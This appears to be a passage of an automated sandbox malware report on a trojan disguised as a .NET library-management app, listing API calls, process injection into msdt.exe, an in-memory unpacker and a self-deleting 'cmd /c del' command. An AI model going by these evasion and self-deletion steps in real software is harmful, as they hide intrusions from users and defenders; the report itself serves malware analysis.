          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0041873A NtReadFile,7_2_0041873A
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_004187BC NtAllocateVirtualMemory,7_2_004187BC
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019299A0 NtCreateSection,LdrInitializeThunk,7_2_019299A0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_01929910
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019298F0 NtReadVirtualMemory,LdrInitializeThunk,7_2_019298F0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929840 NtDelayExecution,LdrInitializeThunk,7_2_01929840
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929860 NtQuerySystemInformation,LdrInitializeThunk,7_2_01929860
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929A00 NtProtectVirtualMemory,LdrInitializeThunk,7_2_01929A00
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929A20 NtResumeThread,LdrInitializeThunk,7_2_01929A20
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929A50 NtCreateFile,LdrInitializeThunk,7_2_01929A50
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019295D0 NtClose,LdrInitializeThunk,7_2_019295D0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929540 NtReadFile,LdrInitializeThunk,7_2_01929540
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929780 NtMapViewOfSection,LdrInitializeThunk,7_2_01929780
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019297A0 NtUnmapViewOfSection,LdrInitializeThunk,7_2_019297A0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929FE0 NtCreateMutant,LdrInitializeThunk,7_2_01929FE0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929710 NtQueryInformationToken,LdrInitializeThunk,7_2_01929710
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019296E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_019296E0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_01929660
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019299D0 NtCreateProcessEx,7_2_019299D0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929950 NtQueueApcThread,7_2_01929950
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019298A0 NtWriteVirtualMemory,7_2_019298A0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929820 NtEnumerateKey,7_2_01929820
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0192B040 NtSuspendThread,7_2_0192B040
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0192A3B0 NtGetContextThread,7_2_0192A3B0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929B00 NtSetValueKey,7_2_01929B00
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929A80 NtOpenDirectoryObject,7_2_01929A80
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929A10 NtQuerySection,7_2_01929A10
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019295F0 NtQueryInformationFile,7_2_019295F0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0192AD30 NtSetContextThread,7_2_0192AD30
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929520 NtWaitForSingleObject,7_2_01929520
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929560 NtWriteFile,7_2_01929560
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0192A710 NtOpenProcessToken,7_2_0192A710
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929730 NtQueryVirtualMemory,7_2_01929730
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0192A770 NtOpenThread,7_2_0192A770
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929770 NtSetInformationFile,7_2_01929770
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929760 NtOpenProcess,7_2_01929760
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019296D0 NtCreateKey,7_2_019296D0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929610 NtEnumerateValueKey,7_2_01929610
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929650 NtQueryValueKey,7_2_01929650
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929670 NtQueryInformationProcess,7_2_01929670
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769540 NtReadFile,LdrInitializeThunk,13_2_04769540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047695D0 NtClose,LdrInitializeThunk,13_2_047695D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769660 NtAllocateVirtualMemory,LdrInitializeThunk,13_2_04769660
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769650 NtQueryValueKey,LdrInitializeThunk,13_2_04769650
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047696E0 NtFreeVirtualMemory,LdrInitializeThunk,13_2_047696E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047696D0 NtCreateKey,LdrInitializeThunk,13_2_047696D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769710 NtQueryInformationToken,LdrInitializeThunk,13_2_04769710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769FE0 NtCreateMutant,LdrInitializeThunk,13_2_04769FE0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769780 NtMapViewOfSection,LdrInitializeThunk,13_2_04769780
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769860 NtQuerySystemInformation,LdrInitializeThunk,13_2_04769860
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769840 NtDelayExecution,LdrInitializeThunk,13_2_04769840
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769910 NtAdjustPrivilegesToken,LdrInitializeThunk,13_2_04769910
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047699A0 NtCreateSection,LdrInitializeThunk,13_2_047699A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769A50 NtCreateFile,LdrInitializeThunk,13_2_04769A50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769560 NtWriteFile,13_2_04769560
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0476AD30 NtSetContextThread,13_2_0476AD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769520 NtWaitForSingleObject,13_2_04769520
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047695F0 NtQueryInformationFile,13_2_047695F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769670 NtQueryInformationProcess,13_2_04769670
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769610 NtEnumerateValueKey,13_2_04769610
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0476A770 NtOpenThread,13_2_0476A770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769770 NtSetInformationFile,13_2_04769770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769760 NtOpenProcess,13_2_04769760
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769730 NtQueryVirtualMemory,13_2_04769730
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0476A710 NtOpenProcessToken,13_2_0476A710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047697A0 NtUnmapViewOfSection,13_2_047697A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0476B040 NtSuspendThread,13_2_0476B040
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769820 NtEnumerateKey,13_2_04769820
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047698F0 NtReadVirtualMemory,13_2_047698F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047698A0 NtWriteVirtualMemory,13_2_047698A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769950 NtQueueApcThread,13_2_04769950
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047699D0 NtCreateProcessEx,13_2_047699D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769A20 NtResumeThread,13_2_04769A20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769A10 NtQuerySection,13_2_04769A10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769A00 NtProtectVirtualMemory,13_2_04769A00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769A80 NtOpenDirectoryObject,13_2_04769A80
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769B00 NtSetValueKey,13_2_04769B00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0476A3B0 NtGetContextThread,13_2_0476A3B0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D18690 NtReadFile,13_2_02D18690
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D187C0 NtAllocateVirtualMemory,13_2_02D187C0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D18710 NtClose,13_2_02D18710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D185E0 NtCreateFile,13_2_02D185E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D187BC NtAllocateVirtualMemory,13_2_02D187BC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D1873A NtReadFile,13_2_02D1873A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D185DA NtCreateFile,13_2_02D185DA
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291189120.0000000000C80000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameReturnValueNameAttribu.exe. vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291856624.0000000003081000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.294459774.0000000006490000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.294190854.0000000006030000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.348444876.00000000035A0000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000007.00000000.286959339.0000000000ED0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameReturnValueNameAttribu.exe. vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.348145495.0000000001B6F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.347642766.00000000019DF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exeBinary or memory string: OriginalFilenameReturnValueNameAttribu.exe. vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: HkE0tD0g4NXKJfy.exeReversingLabs: Detection: 26%
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeFile read: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe:Zone.IdentifierJump to behavior
          Source: HkE0tD0g4NXKJfy.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe "C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe"
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess created: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess created: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HkE0tD0g4NXKJfy.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@13/4
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6108:120:WilError_01
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
          Source: HkE0tD0g4NXKJfy.exeString found in binary or memory: /ReturnValueNameAttribu;component/views/addbook.xaml
          Source: HkE0tD0g4NXKJfy.exeString found in binary or memory: views/addbook.baml
          Source: HkE0tD0g4NXKJfy.exeString found in binary or memory: /ReturnValueNameAttribu;component/views/addcustomer.xaml
          Source: HkE0tD0g4NXKJfy.exeString found in binary or memory: views/addcustomer.baml
          Source: HkE0tD0g4NXKJfy.exeString found in binary or memory: /ReturnValueNameAttribu;component/views/addbook.xaml
          Source: HkE0tD0g4NXKJfy.exeString found in binary or memory: views/addbook.baml
          Source: HkE0tD0g4NXKJfy.exeString found in binary or memory: /ReturnValueNameAttribu;component/views/addcustomer.xaml
          Source: HkE0tD0g4NXKJfy.exeString found in binary or memory: views/addcustomer.baml
          Source: HkE0tD0g4NXKJfy.exeString found in binary or memory: i/ReturnValueNameAttribu;component/views/addbook.xaml
          Source: HkE0tD0g4NXKJfy.exeString found in binary or memory: /ReturnValueNameAttribu;component/views/borrowfrombookview.xamlu/ReturnValueNameAttribu;component/views/borrowingview.xamlo/ReturnValueNameAttribu;component/views/changebook.xamlw/ReturnValueNameAttribu;component/views/changecustomer.xamls/ReturnValueNameAttribu;component/views/customerview.xamlw/ReturnValueNameAttribu;component/views/deletecustomer.xamlm/ReturnValueNameAttribu;component/views/errorview.xamlq/ReturnValueNameAttribu;component/views/smallextras.xamlq/ReturnValueNameAttribu;component/views/addcustomer.xaml
          Source: HkE0tD0g4NXKJfy.exeString found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: HkE0tD0g4NXKJfy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: HkE0tD0g4NXKJfy.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.348444876.00000000035A0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, HkE0tD0g4NXKJfy.exe, 00000007.00000002.347642766.00000000019DF000.00000040.00000001.sdmp, msdt.exe, 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, msdt.exe, 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: HkE0tD0g4NXKJfy.exe, HkE0tD0g4NXKJfy.exe, 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, HkE0tD0g4NXKJfy.exe, 00000007.00000002.347642766.00000000019DF000.00000040.00000001.sdmp, msdt.exe, msdt.exe, 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, msdt.exe, 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp
          Source: Binary string: msdt.pdb source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.348444876.00000000035A0000.00000040.00020000.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: HkE0tD0g4NXKJfy.exe, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.HkE0tD0g4NXKJfy.exe.c10000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.HkE0tD0g4NXKJfy.exe.c10000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 7.0.HkE0tD0g4NXKJfy.exe.e60000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 7.0.HkE0tD0g4NXKJfy.exe.e60000.3.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 7.0.HkE0tD0g4NXKJfy.exe.e60000.2.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 7.0.HkE0tD0g4NXKJfy.exe.e60000.9.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 7.2.HkE0tD0g4NXKJfy.exe.e60000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 7.0.HkE0tD0g4NXKJfy.exe.e60000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 7.0.HkE0tD0g4NXKJfy.exe.e60000.5.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 7.0.HkE0tD0g4NXKJfy.exe.e60000.7.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 0_2_00C192F5 push ds; ret 0_2_00C19340
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 0_2_00C19347 push ds; ret 0_2_00C1934C
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 0_2_00C19361 push ds; retf 0_2_00C19364
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0041B822 push eax; ret 7_2_0041B828
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0041B82B push eax; ret 7_2_0041B892
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0041B88C push eax; ret 7_2_0041B892
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0041C529 push esi; ret 7_2_0041C758
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0041B7D5 push eax; ret 7_2_0041B828
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_00E692F5 push ds; ret 7_2_00E69340
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_00E69361 push ds; retf 7_2_00E69364
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_00E69347 push ds; ret 7_2_00E6934C
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0193D0D1 push ecx; ret 7_2_0193D0E4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0477D0D1 push ecx; ret 13_2_0477D0E4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D1B88C push eax; ret 13_2_02D1B892
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D1B822 push eax; ret 13_2_02D1B828
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D1B82B push eax; ret 13_2_02D1B892
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D1BE43 push esi; retf 13_2_02D1BE49
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D1B7D5 push eax; ret 13_2_02D1B828
          Source: initial sampleStatic PE information: section name: .text entropy: 7.85414523612

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: /c del "C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe"
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: /c del "C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe"Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
